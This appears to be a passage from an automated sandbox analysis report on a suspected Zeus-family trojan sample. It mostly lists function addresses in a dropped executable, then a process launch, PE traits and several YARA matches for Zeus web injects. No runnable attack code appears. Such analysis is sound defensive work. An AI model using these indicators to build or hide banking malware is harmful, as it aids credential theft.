    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F9CBA05_2_02F9CBA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F9E3905_2_02F9E390
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F68B505_2_02F68B50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F948305_2_02F94830
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F968105_2_02F96810
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F9D8005_2_02F9D800
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F689305_2_02F68930
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F966305_2_02F96630
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F9F6205_2_02F9F620
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F887805_2_02F88780
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA17805_2_02FA1780
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F9BF405_2_02F9BF40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F9FCF05_2_02F9FCF0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F95CD05_2_02F95CD0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA44A05_2_02FA44A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F9A4805_2_02F9A480
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F7D5705_2_02F7D570
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015FE9705_2_015FE970
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016210F05_2_016210F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016170D05_2_016170D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016258A05_2_016258A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0161B8805_2_0161B880
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0161D3405_2_0161D340
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01609B805_2_01609B80
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01620A205_2_01620A20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01617A305_2_01617A30
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015E9D305_2_015E9D30
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01615C305_2_01615C30
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0161EC005_2_0161EC00
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01617C105_2_01617C10
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015E9F505_2_015E9F50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016217C05_2_016217C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015EF7E05_2_015EF7E0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0161DFA05_2_0161DFA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0161F7905_2_0161F790
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015E3FA05_2_015E3FA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016156505_2_01615650
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016296135_2_01629613
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016106D05_2_016106D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0161C6D05_2_0161C6D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01622EDD5_2_01622EDD
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025842506_2_02584250
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025982136_2_02598213
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0257F2D06_2_0257F2D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0258B2D06_2_0258B2D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02558B506_2_02558B50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025903C06_2_025903C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255E3E06_2_0255E3E0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0258E3906_2_0258E390
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02552BA06_2_02552BA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0258CBA06_2_0258CBA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025868106_2_02586810
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0258D8006_2_0258D800
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025848306_2_02584830
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025589306_2_02558930
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025866306_2_02586630
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0258F6206_2_0258F620
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0258BF406_2_0258BF40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025787806_2_02578780
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025917806_2_02591780
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02585CD06_2_02585CD0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0258FCF06_2_0258FCF0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0258A4806_2_0258A480
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025944A06_2_025944A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0256D5706_2_0256D570
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02430A206_2_02430A20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02427A306_2_02427A30
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0242D3406_2_0242D340
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02419B806_2_02419B80
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024270D06_2_024270D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024310F06_2_024310F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0242B8806_2_0242B880
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024358A06_2_024358A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0240E9706_2_0240E970
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024256506_2_02425650
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024396136_2_02439613
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024206D06_2_024206D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0242C6D06_2_0242C6D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02432EDD6_2_02432EDD
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023F9F506_2_023F9F50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024317C06_2_024317C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023F3FA06_2_023F3FA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0242F7906_2_0242F790
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023FF7E06_2_023FF7E0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0242DFA06_2_0242DFA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0242EC006_2_0242EC00
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02427C106_2_02427C10
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02425C306_2_02425C30
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023F9D306_2_023F9D30
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025F42508_2_025F4250
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_026082138_2_02608213
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025EF2D08_2_025EF2D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025FB2D08_2_025FB2D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C8B508_2_025C8B50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_026003C08_2_026003C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CE3E08_2_025CE3E0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025FE3908_2_025FE390
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C2BA08_2_025C2BA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025FCBA08_2_025FCBA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025F68108_2_025F6810
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025FD8008_2_025FD800
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025F48308_2_025F4830
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C89308_2_025C8930
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025F66308_2_025F6630
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025FF6208_2_025FF620
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025FBF408_2_025FBF40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025E87808_2_025E8780
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_026017808_2_02601780
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025F5CD08_2_025F5CD0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025FFCF08_2_025FFCF0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_026044A08_2_026044A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025FA4808_2_025FA480
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025DD5708_2_025DD570
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02557A308_2_02557A30
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02560A208_2_02560A20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_0255D3408_2_0255D340
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02549B808_2_02549B80
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025570D08_2_025570D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025610F08_2_025610F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_0255B8808_2_0255B880
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025658A08_2_025658A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_0253E9708_2_0253E970
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025556508_2_02555650
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025696138_2_02569613
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025506D08_2_025506D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_0255C6D08_2_0255C6D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02562EDD8_2_02562EDD
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02529F508_2_02529F50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025617C08_2_025617C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_0252F7E08_2_0252F7E0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_0255F7908_2_0255F790
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02523FA08_2_02523FA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_0255DFA08_2_0255DFA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02557C108_2_02557C10
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_0255EC008_2_0255EC00
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02555C308_2_02555C30
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02529D308_2_02529D30
    Source: C:\Users\user\Desktop\5AFlyarMds.exeProcess token adjusted: SecurityJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 804
    Source: svchost.exe.0.drStatic PE information: Number of sections : 13 > 10
    Source: 5AFlyarMds.exeStatic PE information: Number of sections : 13 > 10
    Source: 5AFlyarMds.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: 1.3.svchost.exe.39c0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2c90000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
